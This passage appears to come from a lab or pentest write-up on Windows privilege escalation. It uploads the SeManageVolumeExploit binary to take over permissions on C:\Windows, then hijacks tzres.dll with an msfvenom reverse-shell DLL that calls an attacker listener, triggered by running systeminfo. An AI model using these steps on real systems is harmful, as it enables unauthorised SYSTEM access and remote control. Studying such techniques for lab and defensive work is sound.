```powershell https://github.com/CsEnox/SeManageVolumeExploit # From Releases SeManageVolumeExploit.exe ```  upload **SeManageVolumeExploit.exe** to the target and execute it. After execution, we discover that the `Builtin Users group` has full permissions on the Windows folder. ```powershell C:\xampp\htdocs\uploads>icacls C:/Windows C:/Windows NT SERVICE\TrustedInstaller:(F) NT SERVICE\TrustedInstaller:(CI)(IO)(F) NT AUTHORITY\SYSTEM:(M) NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F) BUILTIN\Users:(M) BUILTIN\Users:(OI)(CI)(IO)(F) ``` Now we can use that permissions on the Windows folder to hijack a DLL. I'll use `systeminfo`'s `tzres.dll` but you should be able to use any `.dll` ```powershell #1 Create a reverse shell named tzres.dll msfvenom -p windows/x64/shell_reverse_tcp LHOST=lhost LPORT=lport -f dll > tzres.dll #2 Transfer that file into C:\Windows\System32\wbem directory #3 Set up a listener in attacker's kali #4 Run Systeminfo.exe systeminfo ```